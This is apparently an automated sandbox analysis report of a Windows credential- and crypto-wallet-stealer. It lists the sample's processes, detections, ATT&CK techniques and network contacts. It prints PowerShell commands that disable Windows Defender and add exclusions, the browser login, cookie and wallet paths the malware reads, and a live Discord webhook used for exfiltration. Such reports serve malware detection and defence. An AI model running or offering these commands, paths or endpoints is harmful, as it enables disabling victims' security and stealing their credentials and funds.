            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe'Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayNameJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeQueries volume information: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: powershell.exe, 00000012.00000002.1811198234.0000021A2D0E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 2C:\Users\user\AppData\Roaming\Exodus\exodus.walletS
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: /C:\Users\user\AppData\Roaming\Ethereum\keystore
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -C:\Users\user\AppData\Roaming\Binance\wallets8
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: https___files.catbox.moe_l2rczc.pif.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.https___files.catbox.moe_l2rczc.pif.exe.1ebb4d80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: https___files.catbox.moe_l2rczc.pif.exe PID: 7504, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scr, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            File and Directory Permissions Modification
            1
            OS Credential Dumping
            22
            System Information Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            12
            Registry Run Keys / Startup Folder
            11
            Process Injection
            21
            Disable or Modify Tools
            LSASS Memory141
            Security Software Discovery
            Remote Desktop Protocol2
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)12
            Registry Run Keys / Startup Folder
            11
            Obfuscated Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Timestomp
            NTDS41
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials1
            Remote System Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569372 Sample: https___files.catbox.moe_l2... Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 46 ip-api.com 2->46 48 discord.com 2->48 54 Antivirus detection for dropped file 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 7 other signatures 2->60 8 https___files.catbox.moe_l2rczc.pif.exe 14 16 2->8         started        signatures3 process4 dnsIp5 50 ip-api.com 208.95.112.1, 49747, 80 TUT-ASUS United States 8->50 52 discord.com 162.159.135.232, 443, 49819, 49825 CLOUDFLARENETUS United States 8->52 38 C:\ProgramData\Microsoft\...\TqmmU.scr, PE32 8->38 dropped 40 C:\Windows\System32\drivers\etc\hosts, ASCII 8->40 dropped 42 https___files.catb..._l2rczc.pif.exe.log, ASCII 8->42 dropped 44 C:\ProgramData\...\TqmmU.scr:Zone.Identifier, ASCII 8->44 dropped 62 Suspicious powershell command line found 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Drops PE files with a suspicious file extension 8->66 68 5 other signatures 8->68 13 powershell.exe 23 8->13         started        16 powershell.exe 7 8->16         started        18 WMIC.exe 1 8->18         started        20 5 other processes 8->20 file6 signatures7 process8 signatures9 70 Loading BitLocker PowerShell Module 13->70 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        26 conhost.exe 16->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 2 other processes 20->36 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https___files.catbox.moe_l2rczc.pif.exe92%ReversingLabsByteCode-MSIL.Trojan.Zilla
            https___files.catbox.moe_l2rczc.pif.exe100%AviraHEUR/AGEN.1307507
            https___files.catbox.moe_l2rczc.pif.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scr100%AviraHEUR/AGEN.1307507
            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scr100%Joe Sandbox ML
            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scr92%ReversingLabsByteCode-MSIL.Trojan.Zilla
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://go.microsofx0%Avira URL Cloudsafe
            https://oneget.orgX0%Avira URL Cloudsafe
            http://crl.micro0%Avira URL Cloudsafe
            https://oneget.org0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            discord.com
            162.159.135.232
            truefalse
              high
              ip-api.com
              208.95.112.1
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://ip-api.com/json/?fields=225545false
                    high
                    https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obGfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://mail.google.com/mail/?usp=installed_webapphttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://mail.google.com/mail/installwebapp?usp=chrome_defaulthttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://docs.google.com/presentation/Jhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://docs.google.com/document/Jhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/drive/installwebapp?usp=chrome_defaulthttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://discordapp.com/api/v9/users/https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drfalse
                                    high
